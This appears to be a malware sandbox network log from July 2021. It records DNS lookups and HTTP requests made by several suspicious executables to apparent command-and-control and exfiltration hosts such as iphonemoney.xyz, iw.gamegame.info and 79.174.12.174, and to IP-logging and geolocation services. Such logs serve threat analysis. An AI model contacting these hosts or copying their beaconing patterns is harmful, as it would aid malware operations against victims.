content-security-policy: default-src * data: blob: 'self';script-src *.facebook.com *.fbcdn.net *.facebook.net *.google-analytics.com *.google.com 127.0.0.1:* 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src data: blob: 'unsafe-inline' *;connect-src *.facebook.com facebook.com *.fbcdn.net *.facebook.net wss://*.facebook.com:* wss://*.whatsapp.com:* attachment.fbsbx.com ws://localhost:* blob: *.cdninstagram.com 'self';block-all-mixed-content;upgrade-insecure-requests;
X-Frame-Options: DENY
Strict-Transport-Security: max-age=15552000; preload
Content-Type: text/html; charset="utf-8"
X-FB-Debug: myg5RZf8gl8PopDFF/dcGqnSqvCPsd6gFYnFVYK1lFXlbPDcLWgoyGnlZLkahYMvFOr7Eu1csZQqQX00bQH6XQ==
Date: Fri, 02 Jul 2021 07:14:59 GMT
Transfer-Encoding: chunked
Connection: keep-alive

• DNS iphonemoney.xyz
Process: 7398983.exe
Remote address: 8.8.8.8:53
Request
iphonemoney.xyz IN A
Response
iphonemoney.xyz IN A 172.67.182.129
iphonemoney.xyz IN A 104.21.51.159

• GET https://iphonemoney.xyz/api.php?getusers
Process: 7398983.exe
Remote address: 172.67.182.129:443
Request
GET /api.php?getusers HTTP/1.1
Host: iphonemoney.xyz
Connection: Keep-Alive
Response
HTTP/1.1 200 OK
Date: Fri, 02 Jul 2021 07:14:56 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
CF-Cache-Status: DYNAMIC
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=siErtPGIaZlyX5YHai55Lak0LwnByKtCgUUHtNpnHEaX69RIIl7JasrB6KqvZBAA6Uqq3SGuxBzZU9%2FSh%2Fc6RrjfEdizmXqColdyvuB68QgxSJ6iZ5mgIdXVFpYA"}],"group":"cf-nel","max_age":604800}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 6686147e5f9f4db8-FRA
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400

• GET https://iphonemoney.xyz/api.php
Process: 7398983.exe
Remote address: 172.67.182.129:443
Request
GET /api.php HTTP/1.1
Host: iphonemoney.xyz
Response
HTTP/1.1 200 OK
Date: Fri, 02 Jul 2021 07:15:11 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
CF-Cache-Status: DYNAMIC
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=TzuYIy0XhgS7jQFBwQOCaONCKqvk4F3QSq0bQXy6B%2BnREI6TtWNo9kQY1wURQIddnkS11U5fV3r3q5hq0Or8GWQnJNHWPUJKzuwLWu1pA0dZXVuUArWvXvHUXGKR"}],"group":"cf-nel","max_age":604800}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 668614d9bf274db8-FRA
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400

• POST https://iphonemoney.xyz/
Process: 7398983.exe
Remote address: 172.67.182.129:443
Request
POST / HTTP/1.1
Accept: text/html;q=0.9,*/*;q=0.8
Content-Type: multipart/form-data; boundary=---------------------------8d93d289cb8be8f
Host: iphonemoney.xyz
Content-Length: 2844
Expect: 100-continue
Response
HTTP/1.1 200 OK
Date: Fri, 02 Jul 2021 07:15:11 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
CF-Cache-Status: DYNAMIC
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=kz4zkj1cVArStPoiwoSjVdomdv6JyZgdIrJY%2BbpgYh4HEEr6Vlb5LDrIbOuIMGNSioxP4GntUGIDRxz0n409rna9IWX96rU3Uh1Sy9G5oudTUI%2BLM2Ik9bypKF7n"}],"group":"cf-nel","max_age":604800}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 668614dcd9c74db8-FRA
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
POST http://87.251.71.195:82/ (arnatic_7.exe)
Remote address: 87.251.71.195:82
Request
POST / HTTP/1.1
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
Host: 87.251.71.195:82
Content-Length: 137
Expect: 100-continue
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
DNS sergeevih43.tumblr.com (BN2v6gd1v89066wDB6eRa3Rp.exe)
Remote address: 8.8.8.8:53
Request
sergeevih43.tumblr.com IN A
Response
sergeevih43.tumblr.com IN A 74.114.154.22
sergeevih43.tumblr.com IN A 74.114.154.18
GET https://sergeevih43.tumblr.com/ (arnatic_1.exe)
Remote address: 74.114.154.22:443
Request
GET / HTTP/1.1
Host: sergeevih43.tumblr.com
GET http://ip-api.com/json/?fields=8198 (SystemNetworkService)
Remote address: 208.95.112.1:80
Request
GET /json/?fields=8198 HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Host: ip-api.com
Connection: Keep-Alive
Cache-Control: no-cache
Response
HTTP/1.1 200 OK
Date: Fri, 02 Jul 2021 07:15:01 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 58
Access-Control-Allow-Origin: *
X-Ttl: 60
X-Rl: 44
DNS uyg5wye.2ihsfa.com (jooyu.exe)
Remote address: 8.8.8.8:53
Request
uyg5wye.2ihsfa.com IN A
Response
uyg5wye.2ihsfa.com IN A 88.218.92.148
GET http://uyg5wye.2ihsfa.com/api/fbtime (arnatic_4.exe)
Remote address: 88.218.92.148:80
Request
GET /api/fbtime HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Host: uyg5wye.2ihsfa.com
Response
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 02 Jul 2021 07:15:12 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/7.3.21
POST http://uyg5wye.2ihsfa.com/api/?sid=290613&key=d7f614e3c3e5f3d02ab84fc794796c5b (arnatic_4.exe)
Remote address: 88.218.92.148:80
Request
POST /api/?sid=290613&key=d7f614e3c3e5f3d02ab84fc794796c5b HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Content-Length: 266
Host: uyg5wye.2ihsfa.com
Response
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 02 Jul 2021 07:15:14 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/7.3.21
DNS iw.gamegame.info (SystemNetworkService)
Remote address: 8.8.8.8:53
Request
iw.gamegame.info IN A
Response
iw.gamegame.info IN A 104.21.21.221
iw.gamegame.info IN A 172.67.200.215
POST http://iw.gamegame.info/report7.4.php (SystemNetworkService)
Remote address: 104.21.21.221:80
Request
POST /report7.4.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Host: iw.gamegame.info
Content-Length: 278
Connection: Keep-Alive
Cache-Control: no-cache
Response
HTTP/1.1 403 Forbidden
Date: Fri, 02 Jul 2021 07:15:02 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
CF-Chl-Bypass: 1
Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                        cf-request-id: 0b07ab3bae0000627d4e267000000001
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=6fldDbYKlHt4SkcAEjWv18AnAF6ZArHUp1XoMQuZaogFY%2FMmzKYbuHTRLA4eQYhy3c%2Fcn0ZQQotXNuGJMBLt%2B2pKjMp3O76KTfAHw%2BfrIQ%2BYLYtSDTDhzodcxAvXJQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 668614a5ec1a627d-OTP
                                                                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        DNS
                                                                                                                                                                                        download-serv-235442.xyz
                                                                                                                                                                                        4460127.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        8.8.8.8:53
                                                                                                                                                                                        Request
                                                                                                                                                                                        download-serv-235442.xyz
                                                                                                                                                                                        IN A
                                                                                                                                                                                        Response
                                                                                                                                                                                        download-serv-235442.xyz
                                                                                                                                                                                        IN A
                                                                                                                                                                                        104.21.54.72
                                                                                                                                                                                        download-serv-235442.xyz
                                                                                                                                                                                        IN A
                                                                                                                                                                                        172.67.136.97
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        GET
                                                                                                                                                                                        https://download-serv-235442.xyz/api.php
                                                                                                                                                                                        4460127.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        104.21.54.72:443
                                                                                                                                                                                        Request
                                                                                                                                                                                        GET /api.php HTTP/1.1
                                                                                                                                                                                        Host: download-serv-235442.xyz
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:15:07 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                                        Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=xINpfMYa46u0cEQa5nK1EZze8pIrkmTaM3MynnjUvC9b64X7YvaFPuPv7tPyS8etobi1L5n86eIVBxTxxILwwLro3nK7tj07i26%2F41d9Uz5USkMOnQDroMib3TPhJzpS5BSx9aHM"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 668614c22d6c1ccc-BUD
                                                                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        https://download-serv-235442.xyz/
                                                                                                                                                                                        4460127.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        104.21.54.72:443
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST / HTTP/1.1
                                                                                                                                                                                        Accept: text/html;q=0.9,*/*;q=0.8
                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=---------------------------8d93d289a7eed36
                                                                                                                                                                                        Host: download-serv-235442.xyz
                                                                                                                                                                                        Content-Length: 3784
                                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:15:23 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                                        Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=zWr0XmFGkfIT1yTajoDWJvsRgucOxyEbMOaVF8Q%2BlBpKC9kJfwAS6Yc3CAxJ0L0rqgsXgviNABUjM6QM1l1N0Hmawkez%2BghirKXV64GgcxF3%2B6M%2BsjgF4DYClqHlYHVpkB3D72Nw"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 668614c5aa351ccc-BUD
                                                                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        DNS
                                                                                                                                                                                        iplogger.org
                                                                                                                                                                                        jooyu.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        8.8.8.8:53
                                                                                                                                                                                        Request
                                                                                                                                                                                        iplogger.org
                                                                                                                                                                                        IN A
                                                                                                                                                                                        Response
                                                                                                                                                                                        iplogger.org
                                                                                                                                                                                        IN A
                                                                                                                                                                                        88.99.66.31
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        GET
                                                                                                                                                                                        https://iplogger.org/1SPHi7
                                                                                                                                                                                        arnatic_5.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        88.99.66.31:443
                                                                                                                                                                                        Request
                                                                                                                                                                                        GET /1SPHi7 HTTP/1.1
                                                                                                                                                                                        User-Agent: Th624
                                                                                                                                                                                        Host: iplogger.org
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:15:07 GMT
                                                                                                                                                                                        Content-Type: image/png
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                        Set-Cookie: PHPSESSID=ur83p1m1vtrjaehtu51ugeun81; path=/; HttpOnly
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Set-Cookie: clhf03028ja=185.100.87.202; expires=Wed, 18-Jul-2029 05:49:51 GMT; Max-Age=253838084; path=/
                                                                                                                                                                                        Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                                        Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                        Answers: 5
                                                                                                                                                                                        whoami: 27d91697e61e333e80570a3904bc4659139cd9f1a7251582095faa02cdc29a29
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000; preload
                                                                                                                                                                                        X-Frame-Options: DENY
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        DNS
                                                                                                                                                                                        pcfixmy-download-13.xyz
                                                                                                                                                                                        3466090.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        8.8.8.8:53
                                                                                                                                                                                        Request
                                                                                                                                                                                        pcfixmy-download-13.xyz
                                                                                                                                                                                        IN A
                                                                                                                                                                                        Response
                                                                                                                                                                                        pcfixmy-download-13.xyz
                                                                                                                                                                                        IN A
104.21.46.30
pcfixmy-download-13.xyz IN A 172.67.222.237

• flag-unknown
  GET https://pcfixmy-download-13.xyz/api.php?getusers
  3466090.exe
  Remote address: 104.21.46.30:443
  Request
  GET /api.php?getusers HTTP/1.1
  Host: pcfixmy-download-13.xyz
  Connection: Keep-Alive
  Response
  HTTP/1.1 200 OK
  Date: Fri, 02 Jul 2021 07:15:08 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: keep-alive
  Vary: Accept-Encoding
  CF-Cache-Status: DYNAMIC
  Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=O6xA9gbvdUamb9hLyOcNN%2BwMTBWXvHuCmle63dEAF%2Fwkbsw5wz%2FJkPVmj7TEDduCdmRag%2BzVDg%2FmDPc4Z7gchpP7xur2lpA4p7U4rjE92K8%2BZPbUeqOJWfy8loN2LUp4hsw19b0%3D"}],"group":"cf-nel","max_age":604800}
  NEL: {"report_to":"cf-nel","max_age":604800}
  Server: cloudflare
  CF-RAY: 668614c6abddacac-OTP
  alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400

• flag-unknown
  GET https://pcfixmy-download-13.xyz/api.php
  3466090.exe
  Remote address: 104.21.46.30:443
  Request
  GET /api.php HTTP/1.1
  Host: pcfixmy-download-13.xyz
  Response
  HTTP/1.1 200 OK
  Date: Fri, 02 Jul 2021 07:15:33 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: keep-alive
  Vary: Accept-Encoding
  CF-Cache-Status: DYNAMIC
  Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=0%2FoxkGZXyQv7SqpUzik8RhB3YusL1IAqwQIjQZBoJr24ZDZFP4Ege%2FijVsC0xQIJtl8yeAIEerimdhDEVDmJesGiglZ%2F46SfJ8B%2BQ33B0EmAAYkgrDC9dF6LoqGmrUN6jKdqgW4%3D"}],"group":"cf-nel","max_age":604800}
  NEL: {"report_to":"cf-nel","max_age":604800}
  Server: cloudflare
  CF-RAY: 66861565e97bacac-OTP
  alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400

• flag-unknown
  POST https://pcfixmy-download-13.xyz/
  3466090.exe
  Remote address: 104.21.46.30:443
  Request
  POST / HTTP/1.1
  Content-Type: multipart/form-data; boundary=------------------------8d93d28aa3c32e0
  Host: pcfixmy-download-13.xyz
  Content-Length: 2787
  Expect: 100-continue
  Response
  HTTP/1.1 200 OK
  Date: Fri, 02 Jul 2021 07:15:35 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: keep-alive
  CF-Cache-Status: DYNAMIC
  Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=eVXVxDODVQdUY9ppAFaet8JKqJWXkd0BkddrJVnchJiWskr9PWGZ%2BcEILrgl1KBM2B4Od4nOq2mhnQuY9RDdgw3ExW0VH8i7gOI7Lc24LhYSRLtiz9OOHUdMLkQIS8%2BJmoa87sU%3D"}],"group":"cf-nel","max_age":604800}
  NEL: {"report_to":"cf-nel","max_age":604800}
  Server: cloudflare
  CF-RAY: 6686156ace81acac-OTP
  alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400

• flag-unknown
  GET https://iplogger.org/1vpFz7
  arnatic_5.exe
  Remote address: 88.99.66.31:443
  Request
  GET /1vpFz7 HTTP/1.1
  Host: iplogger.org
  Response
  HTTP/1.1 200 OK
  Server: nginx
  Date: Fri, 02 Jul 2021 07:15:08 GMT
  Content-Type: image/png
  Transfer-Encoding: chunked
  Connection: keep-alive
  Set-Cookie: PHPSESSID=t3aiug7kdk92rm8r1kc5717hp0; path=/; HttpOnly
  Pragma: no-cache
  Set-Cookie: clhf03028ja=185.100.87.202; expires=Wed, 18-Jul-2029 05:49:51 GMT; Max-Age=253838083; path=/
  Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
  Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
  Cache-Control: no-cache
  Expires: Thu, 01 Jan 1970 00:00:01 GMT
  Answers: 5
  whoami: 66dc2a05a832ae7f9e5ca94bc91789a03af84f18776705db53eb24fade17bd93
  Strict-Transport-Security: max-age=31536000; preload
  X-Frame-Options: DENY

• flag-unknown
  POST http://iw.gamegame.info/report7.4.php
  SystemNetworkService
  Remote address: 104.21.21.221:80
  Request
  POST /report7.4.php HTTP/1.1
  Accept: */*
  Content-Type: application/x-www-form-urlencoded
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
  Host: iw.gamegame.info
  Content-Length: 278
  Connection: Keep-Alive
  Cache-Control: no-cache
  Response
  HTTP/1.1 403 Forbidden
  Date: Fri, 02 Jul 2021 07:15:14 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: close
  CF-Chl-Bypass: 1
  Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
  Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
  Expires: Thu, 01 Jan 1970 00:00:01 GMT
  X-Frame-Options: SAMEORIGIN
  cf-request-id: 0b07ab68b80000fab0aba27000000001
  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=7j%2BGZjSZEes8ILb2x8QGhdNNfZZJKtc5KJ1%2BuSqsJnUi%2FaAJDrAV1kefYEU%2BIeBRi1OzPrev4wYnSYHDY6ccSQ6vB5mVZaym0vKy6xINL%2BeA3Mtv7eW9dOpHrwbkjw%3D%3D"}],"group":"cf-nel","max_age":604800}
  NEL: {"report_to":"cf-nel","max_age":604800}
  Server: cloudflare
  CF-RAY: 668614edffa7fab0-OSL
  alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400

• flag-unknown
  GET http://136.144.41.201/server.txt
  arnatic_6.exe
  Remote address: 136.144.41.201:80
  Request
  GET /server.txt HTTP/1.1
  Connection: Keep-Alive
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
  Host: 136.144.41.201
  Response
  HTTP/1.1 200 OK
  Date: Fri, 02 Jul 2021 07:15:18 GMT
  Server: Apache/2.4.41 (Ubuntu)
  Last-Modified: Wed, 30 Jun 2021 10:04:51 GMT
  ETag: "12-5c5f8da7cddac"
  Accept-Ranges: bytes
  Content-Length: 18
  Keep-Alive: timeout=5, max=100
  Connection: Keep-Alive
  Content-Type: text/plain

• flag-unknown
  DNS ipinfo.io
  1um0tg3NcHdOWZT14jfQXEXD.exe
  Remote address: 8.8.8.8:53
  Request
                                                                                                                                                                                        ipinfo.io
                                                                                                                                                                                        IN A
                                                                                                                                                                                        Response
                                                                                                                                                                                        ipinfo.io
                                                                                                                                                                                        IN A
                                                                                                                                                                                        34.117.59.81
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        GET
                                                                                                                                                                                        https://ipinfo.io/widget
                                                                                                                                                                                        arnatic_6.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        34.117.59.81:443
                                                                                                                                                                                        Request
                                                                                                                                                                                        GET /widget HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Referer: https://ipinfo.io/
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
                                                                                                                                                                                        Host: ipinfo.io
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        access-control-allow-origin: *
                                                                                                                                                                                        x-frame-options: DENY
                                                                                                                                                                                        x-xss-protection: 1; mode=block
                                                                                                                                                                                        x-content-type-options: nosniff
                                                                                                                                                                                        referrer-policy: strict-origin-when-cross-origin
                                                                                                                                                                                        content-type: application/json; charset=utf-8
                                                                                                                                                                                        content-length: 826
                                                                                                                                                                                        date: Fri, 02 Jul 2021 07:15:19 GMT
                                                                                                                                                                                        x-envoy-upstream-service-time: 20
                                                                                                                                                                                        Via: 1.1 google
                                                                                                                                                                                        Alt-Svc: clear
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        DNS
                                                                                                                                                                                        ppcspb.com
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        8.8.8.8:53
                                                                                                                                                                                        Request
                                                                                                                                                                                        ppcspb.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        Response
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        DNS
                                                                                                                                                                                        ppcspb.com
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        8.8.8.8:53
                                                                                                                                                                                        Request
                                                                                                                                                                                        ppcspb.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        Response
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        DNS
                                                                                                                                                                                        ppcspb.com
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        8.8.8.8:53
                                                                                                                                                                                        Request
                                                                                                                                                                                        ppcspb.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        Response
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        DNS
                                                                                                                                                                                        ppcspb.com
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        8.8.8.8:53
                                                                                                                                                                                        Request
                                                                                                                                                                                        ppcspb.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        Response
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://79.174.12.174/base/api/getData.php
                                                                                                                                                                                        arnatic_6.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        79.174.12.174:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /base/api/getData.php HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
                                                                                                                                                                                        Content-Length: 133
                                                                                                                                                                                        Host: 79.174.12.174
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:15:20 GMT
                                                                                                                                                                                        Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/8.0.7
                                                                                                                                                                                        X-Powered-By: PHP/8.0.7
                                                                                                                                                                                        Content-Length: 263
                                                                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://79.174.12.174/base/api/getData.php
                                                                                                                                                                                        arnatic_6.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        79.174.12.174:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /base/api/getData.php HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
                                                                                                                                                                                        Content-Length: 133
                                                                                                                                                                                        Host: 79.174.12.174
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:15:20 GMT
                                                                                                                                                                                        Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/8.0.7
                                                                                                                                                                                        X-Powered-By: PHP/8.0.7
                                                                                                                                                                                        Content-Length: 263
                                                                                                                                                                                        Keep-Alive: timeout=5, max=99
                                                                                                                                                                                        Connection: Keep-Alive
